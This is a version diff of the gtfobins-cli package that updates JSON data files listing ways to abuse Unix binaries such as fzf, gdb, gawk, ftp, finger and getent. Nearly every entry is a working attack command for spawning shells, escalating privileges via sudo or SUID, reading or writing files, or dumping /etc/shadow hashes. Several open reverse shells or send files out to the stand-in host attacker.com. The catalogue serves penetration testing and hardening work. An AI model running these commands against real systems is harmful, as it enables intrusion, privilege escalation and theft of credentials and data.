gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/finger.json

@@ -1,17 +1,16 @@
 {
-  "description": "'finger' hangs waiting for the remote peer to close the socket.",
   "functions": {
     "file-upload": [
       {
-        "description": "Send a binary file to a TCP port. Run 'sudo nc -l -p 79 | base64 -d > [file]' on the attacker box to collect the file. The file length is limited by the maximum size of arguments.",
-        "code": "finger \"$(base64 [file])@[host]\"\n"
+        "description": "Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > \"file_to_save\"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.",
+        "code": "RHOST=attacker.com\nLFILE=file_to_send\nfinger \"$(base64 $LFILE)@$RHOST\"\n"
       }
     ],
     "file-download": [
       {
-        "description": "Fetch remote binary file from a remote TCP port. Run 'base64 [file] | sudo nc -l -p 79' on the attacker box to send the file.",
-        "code": "finger x@[host] | base64 -d > [file]\n"
+        "description": "Fetch remote binary file from a remote TCP port. Run `base64 \"file_to_send\" | sudo nc -l -p 79` on the attacker box to send the file.",
+        "code": "RHOST=attacker.com\nLFILE=file_to_save\nfinger x@$RHOST | base64 -d > \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/firejail.json

@@ -0,0 +1,35 @@
+{
+  "comment": "firejail is a sandboxing tool for Linux. It can be abused to spawn shells,\nread and write files outside the sandbox, and escalate privileges when misconfigured.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "firejail --noprofile cat /path/to/file-input\n",
+        "contexts": {
+          "sudo": {},
+          "suid": {},
+          "unprivileged": {}
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "code": "firejail --noprofile sh -c 'echo data > /path/to/file-output'\n",
+        "contexts": {
+          "sudo": {},
+          "suid": {},
+          "unprivileged": {}
+        }
+      }
+    ],
+    "shell": [
+      {
+        "code": "firejail --noprofile /bin/sh\n",
+        "contexts": {
+          "sudo": {},
+          "suid": {},
+          "unprivileged": {}
+        }
+      }
+    ]
+  }
+}

gtfo/data/fish.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "fish\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./fish\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo fish\n"
+      }
+    ]
+  }
+}

gtfo/data/flock.json

@@ -2,18 +2,21 @@
   "functions": {
     "shell": [
       {
-        "code": "flock -u / /bin/sh"
+        
+        "code": "flock -u / /bin/sh\n"
       }
     ],
     "suid": [
       {
-        "code": "./flock -u / /bin/sh -p"
+        
+        "code": "./flock -u / /bin/sh -p\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo flock -u / /bin/sh"
+        
+        "code": "sudo flock -u / /bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/fmt.json

@@ -1,27 +1,26 @@
 {
-  "description": "The read file content is not binary-safe.",
   "functions": {
     "file-read": [
       {
         "description": "This only works for the GNU version of `fmt`.",
-        "code": "fmt -pNON_EXISTING_PREFIX [file]\n"
+        "code": "LFILE=file_to_read\nfmt -pNON_EXISTING_PREFIX \"$LFILE\"\n"
       },
       {
         "description": "This corrupts the output by wrapping very long lines at the given width.",
-        "code": "fmt -999 [file]\n"
+        "code": "LFILE=file_to_read\nfmt -999 \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
         "description": "This corrupts the output by wrapping very long lines at the given width.",
-        "code": "./fmt -999 [file]\n"
+        "code": "LFILE=file_to_read\n./fmt -999 \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
         "description": "This corrupts the output by wrapping very long lines at the given width.",
-        "code": "sudo fmt -999 [file]\n"
+        "code": "LFILE=file_to_read\nsudo fmt -999 \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/fold.json

@@ -2,18 +2,21 @@
   "functions": {
     "file-read": [
       {
-        "code": "fold -w99999999 [file]\n"
+        
+        "code": "LFILE=file_to_read\nfold -w99999999 \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./fold -w99999999 [file]\n"
+        
+        "code": "LFILE=file_to_read\n./fold -w99999999 \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo fold -w99999999 [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo fold -w99999999 \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/fping.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nfping -f $LFILE\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo fping -f $LFILE\n"
+      }
+    ]
+  }
+}

gtfo/data/ftp.json

@@ -2,25 +2,27 @@
   "functions": {
     "shell": [
       {
+        
         "code": "ftp\n!/bin/sh\n"
       }
     ],
     "file-upload": [
       {
         "description": "Send local file to a FTP server.",
-        "code": "ftp [host]\nput [file]\n"
+        "code": "RHOST=attacker.com\nftp $RHOST\nput file_to_send\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file from a FTP server.",
-        "code": "ftp [host]\nget [file]\n"
+        "code": "RHOST=attacker.com\nftp $RHOST\nget file_to_get\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo ftp\n!/bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/fzf.json

@@ -0,0 +1,90 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "Press ``<Enter>`` when you enter the fzf panel to receive the shell.",
+        "code": "fzf --bind \"enter:execute(/bin/sh)\"\n"
+      }
+    ],
+    "command": [
+      {
+        "description": "",
+        "code": "export COMMAND='id'\nfzf --bind \"enter:execute($COMMAND)\"\n"
+      },
+      {
+        "description": "Set up port forwarding via SSH or Chisel using ``$LPORT``.",
+        "code": "export LPORT=7777\nexport COMMAND='id'\nfzf --listen=$LPORT\ncurl -X POST localhost:$LPORT -d \"reload($COMMAND)\" # Attacker box\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run ``nc -l -p 12345`` on the attacker box, then press ``<Enter>`` in the fzf panel to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nfzf --bind \"enter:execute(/bin/sh -i >& /dev/tcp/$RHOST/$RPORT 0>&1)\"\n"
+      },
+      {
+        "description": "Set up port forwarding via SSH or Chisel using ``$LPORT``, then run ``nc -l -p 12345`` on the attacker box to receive the shell. It only works with the traditional version of ``nc``.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LPORT=7777\nfzf --listen=$LPORT\ncurl -X POST localhost:$LPORT -d \"reload(nc $RHOST $RPORT -e /bin/sh)\" # Attacker box\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file using a TCP connection. Run ``nc -l -p 12345 > \"file_to_save\"`` on the attacker box to collect the file.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LFILE=file_to_send\nfzf --bind \"enter:execute(cat $LFILE > /dev/tcp/$RHOST/$RPORT)\"\n"
+      },
+      {
+        "description": "Set up port forwarding via SSH or Chisel using ``$LPORT``, then run ``nc -l -p 12345 > \"file_to_save\"`` on the attacker box to collect the file.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LPORT=7777\nexport LFILE=file_to_send\nfzf --listen=$LPORT\ncurl -X POST localhost:$LPORT -d \"reload(cat $LFILE > /dev/tcp/$RHOST/$RPORT)\" # Attacker box\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch remote file using a TCP connection. Run ``nc -l -p 12345 < \"file_to_send\"`` on the attacker box to send the file.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LFILE=file_to_get\nfzf --bind \"enter:execute(cat < /dev/tcp/$RHOST/$RPORT > $LFILE)\"\n"
+      },
+      {
+        "description": "Set up port forwarding via SSH or Chisel using ``$LPORT``, then run ``nc -l -p 12345 < \"file_to_send\"`` on the attacker box to send the file.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LPORT=7777\nexport LFILE=file_to_get\nfzf --listen=$LPORT\ncurl -X POST localhost:$LPORT -d \"reload(cat < /dev/tcp/$RHOST/$RPORT > $LFILE)\" # Attacker box\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "Press ``<Enter>`` and then ``<Esc>`` when you enter the fzf panel to write the file.",
+        "code": "export LFILE=file_to_write\nfzf --bind \"enter:execute(echo 'DATA' > $LFILE)\"\n"
+      },
+      {
+        "description": "Set up port forwarding via SSH or Chisel using ``$LPORT``.",
+        "code": "export LPORT=7777\nexport LFILE=file_to_write\nfzf --listen=$LPORT\ncurl -X POST localhost:$LPORT -d \"reload(echo 'DATA' > $LFILE)\" # Attacker box\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "Press ``<Enter>`` and then ``<Esc>`` when you enter the fzf panel to read the file.",
+        "code": "export LFILE=file_to_read\nfzf --bind \"enter:execute(/bin/cat $LFILE)\"\n"
+      },
+      {
+        "description": "Set up port forwarding via SSH or Chisel using ``$LPORT``.",
+        "code": "export LPORT=7777\nexport LFILE=file_to_read\nfzf --listen=$LPORT\ncurl -X POST localhost:$LPORT -d \"reload(/bin/cat $LFILE)\" # Attacker box\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "Press ``<Enter>`` when you enter the fzf panel to receive the shell. It only works on Ubuntu.",
+        "code": "./fzf --bind \"enter:execute(/bin/sh)\"\n"
+      },
+      {
+        "description": "Set up port forwarding via SSH or Chisel using ``$LPORT``, then run ``nc -l -p 12345`` on the attacker box to receive the shell. It only works on Ubuntu and with the traditional version of ``nc``.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LPORT=7777\n./fzf --listen=$LPORT\ncurl -X POST localhost:$LPORT -d \"reload(nc $RHOST $RPORT -e /bin/sh)\" # Attacker box\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Press ``<Enter>`` when you enter the fzf panel to receive the shell.",
+        "code": "sudo fzf --bind \"enter:execute(/bin/sh)\"\n"
+      },
+      {
+        "description": "Set up port forwarding via SSH or Chisel using ``$LPORT``, then run ``nc -l -p 12345`` on the attacker box to receive the shell. It only works with the traditional version of ``nc``.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nexport LPORT=7777\nsudo fzf --listen=$LPORT\ncurl -X POST localhost:$LPORT -d \"reload(nc $RHOST $RPORT -e /bin/sh)\" # Attacker box\n"
+      }
+    ]
+  }
+}

gtfo/data/gawk.json

@@ -2,44 +2,50 @@
   "functions": {
     "shell": [
       {
-        "code": "gawk 'BEGIN {system(\"/bin/sh\")}'"
+        
+        "code": "gawk 'BEGIN {system(\"/bin/sh\")}'\n"
       }
     ],
     "non-interactive-reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
-        "code": "gawk 'BEGIN {\n    s = \"/inet/tcp/0/[host]/[port]\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell.",
+        "code": "RHOST=attacker.com\nRPORT=12345\ngawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {\n    s = \"/inet/tcp/0/\" RHOST \"/\" RPORT;\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
       }
     ],
     "non-interactive-bind-shell": [
       {
-        "description": "Run 'nc target.com 12345' on the attacker box to connect to the shell.",
-        "code": "gawk 'BEGIN {\n    s = \"/inet/tcp/[port]/0/0\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
+        "description": "Run `nc target.com 12345` on the attacker box to connect to the shell.",
+        "code": "LPORT=12345\ngawk -v LPORT=$LPORT 'BEGIN {\n    s = \"/inet/tcp/\" LPORT \"/0/0\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
       }
     ],
     "file-write": [
       {
-        "code": "gawk 'BEGIN { print \"DATA\" > \"[file]\" }'\n"
+        
+        "code": "LFILE=file_to_write\ngawk -v LFILE=$LFILE 'BEGIN { print \"DATA\" > LFILE }'\n"
       }
     ],
     "file-read": [
       {
-        "code": "gawk '//' [file]\n"
+        
+        "code": "LFILE=file_to_read\ngawk '//' \"$LFILE\"\n"
       }
     ],
-      "suid": [
+    "suid": [
       {
-        "code": "./gawk '//' \"[file]\""
+        
+        "code": "LFILE=file_to_read\n./gawk '//' \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo gawk 'BEGIN {system(\"/bin/sh\")}'"
+        
+        "code": "sudo gawk 'BEGIN {system(\"/bin/sh\")}'\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "./gawk 'BEGIN {system(\"/bin/sh\")}'"
+        
+        "code": "./gawk 'BEGIN {system(\"/bin/sh\")}'\n"
       }
     ]
   }

gtfo/data/gcc.json

@@ -2,22 +2,30 @@
   "functions": {
     "file-read": [
       {
-        "code": "gcc -x c -E \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\ngcc -x c -E \"$LFILE\"\n"
+      },
+      {
+        "description": "The file is read and parsed as a list of files (one per line), the content is disaplyed as error messages, thus this might not be suitable to read arbitrary data.",
+        "code": "LFILE=file_to_read\ngcc @\"$LFILE\"\n"
       }
     ],
     "file-write": [
       {
-        "code": "gcc -xc /dev/null -o [file]\n"
+        
+        "code": "LFILE=file_to_delete\ngcc -xc /dev/null -o $LFILE\n"
       }
     ],
     "shell": [
       {
-        "code": "gcc -wrapper /bin/sh,-s ."
+        
+        "code": "gcc -wrapper /bin/sh,-s .\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo gcc -wrapper /bin/sh,-s ."
+        
+        "code": "sudo gcc -wrapper /bin/sh,-s .\n"
       }
     ]
   }

gtfo/data/gcloud.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
+        "code": "gcloud help\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
+        "code": "sudo gcloud help\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/gcore.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "gcore $PID\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo gcore $PID\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./gcore $PID\n"
+      }
+    ]
+  }
+}

gtfo/data/gdb.json

@@ -2,65 +2,67 @@
   "functions": {
     "shell": [
       {
-        "code": "gdb -nx -ex '!sh' -ex quit"
+        
+        "code": "gdb -nx -ex '!sh' -ex quit\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "This requires that GDB is compiled with Python support. Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
-        "code": "gdb -nx -ex 'python import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' -ex quit\n"
+        "description": "This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\ngdb -nx -ex 'python import sys,socket,os,pty;s=socket.socket()\ns.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' -ex quit\n"
       }
     ],
     "file-upload": [
       {
         "description": "This requires that GDB is compiled with Python support. Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
-        "code": "gdb -nx -ex 'python import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\",).read()}).encode()))' -ex quit\n"
+        "code": "export URL=http://attacker.com/\nexport LFILE=file_to_send\ngdb -nx -ex 'python import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(e[\"URL\"], bytes(u.urlencode({\"d\":open(e[\"LFILE\"]).read()}).encode()))' -ex quit\n"
       },
       {
         "description": "This requires that GDB is compiled with Python support. Serve files in the local folder running an HTTP server.",
-        "code": "gdb -nx -ex 'python import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit\n"
+        "code": "export LPORT=8888\ngdb -nx -ex 'python import sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", int(e[\"LPORT\"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit\n"
       }
     ],
     "file-download": [
       {
         "description": "This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.",
-        "code": "gdb -nx -ex 'python import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\",)' -ex quit\n"
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\ngdb -nx -ex 'python import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(e[\"URL\"], e[\"LFILE\"])' -ex quit\n"
       }
     ],
     "file-write": [
       {
         "description": "This requires that GDB is compiled with Python support.",
-        "code": "gdb -nx -ex \"dump value [file] \\\"DATA\\\"\" -ex quit\n"
+        "code": "LFILE=file_to_write\ngdb -nx -ex \"dump value $LFILE \\\"DATA\\\"\" -ex quit\n"
       }
     ],
     "file-read": [
       {
         "description": "This requires that GDB is compiled with Python support.",
-        "code": "gdb -nx -ex 'python print(open(\"[file]\").read())' -ex quit"
+        "code": "gdb -nx -ex 'python print(open(\"file_to_read\").read())' -ex quit\n"
       }
     ],
     "library-load": [
       {
         "description": "This requires that GDB is compiled with Python support.",
-        "code": "gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' -ex quit"
+        "code": "gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' -ex quit\n"
       }
     ],
     "suid": [
       {
         "description": "This requires that GDB is compiled with Python support.",
-        "code": "./gdb -nx -ex 'python import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")' -ex quit"
+        "code": "./gdb -nx -ex 'python import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")' -ex quit\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo gdb -nx -ex '!sh' -ex quit"
+        
+        "code": "sudo gdb -nx -ex '!sh' -ex quit\n"
       }
     ],
     "capabilities": [
       {
         "description": "This requires that GDB is compiled with Python support.",
-        "code": "./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit"
+        "code": "./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit\n"
       }
     ]
   }
-}
+}

gtfo/data/gem.json

@@ -2,27 +2,27 @@
   "functions": {
     "shell": [
       {
-        "description": "This requires the name of an installed gem to be provided ('rdoc' is usually installed).",
-        "code": "gem open -e \"/bin/sh -c /bin/sh\" rdoc"
+        "description": "This requires the name of an installed gem to be provided (`rdoc` is usually installed).",
+        "code": "gem open -e \"/bin/sh -c /bin/sh\" rdoc\n"
       },
       {
-        "description": "This invokes the default editor, which is likely to be 'vi', other functions may apply. This requires the name of an installed gem to be provided ('rdoc' is usually installed).",
+        "description": "This invokes the default editor, which is likely to be [`vi`](/gtfobins/vi/), other functions may apply. This requires the name of an installed gem to be provided (`rdoc` is usually installed).",
         "code": "gem open rdoc\n:!/bin/sh\n"
       },
       {
-        "description": "This executes the specified file as 'ruby' code.",
+        "description": "This executes the specified file as [`ruby`](/gtfobins/ruby/) code.",
         "code": "TF=$(mktemp -d)\necho 'system(\"/bin/sh\")' > $TF/x\ngem build $TF/x\n"
       },
       {
-        "description": "This executes the specified file as 'ruby' code.",
+        "description": "This executes the specified file as [`ruby`](/gtfobins/ruby/) code.",
         "code": "TF=$(mktemp -d)\necho 'system(\"/bin/sh\")' > $TF/x\ngem install --file $TF/x\n"
       }
     ],
     "sudo": [
       {
-        "description": "This requires the name of an installed gem to be provided ('rdoc' is usually installed).",
-        "code": "sudo gem open -e \"/bin/sh -c /bin/sh\" rdoc"
+        "description": "This requires the name of an installed gem to be provided (`rdoc` is usually installed).",
+        "code": "sudo gem open -e \"/bin/sh -c /bin/sh\" rdoc\n"
       }
     ]
   }
-}
+}

gtfo/data/genie.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "genie -c '/bin/sh'\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./genie -c '/bin/sh'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo genie -c '/bin/sh'\n"
+      }
+    ]
+  }
+}

gtfo/data/genisoimage.json

@@ -1,15 +1,22 @@
 {
-  "description": "The output is placed inside the ISO9660 file system binary format thus it may not be suitable for binary content as is, yet it can be mounted or extracted with tools like '7z'.",
   "functions": {
     "file-read": [
       {
-        "code": "genisoimage -q -o - \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\ngenisoimage -q -o - \"$LFILE\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "The file is parsed, and some of its content is disclosed by the error messages, thus this might not be suitable to read arbitrary data.",
+        "code": "LFILE=file_to_read\n./genisoimage -sort \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo genisoimage -q -o - \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo genisoimage -q -o - \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/getent.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "suid": [
+      {
+        "description": "",
+        "code": "# Leak root hash from /etc/shadow via getent SUID binary\n./getent shadow root\n"
+      },
+      {
+        "description": "",
+        "code": "# Dump all hashes\n./getent shadow\n"
+      }
+    ]
+  }
+}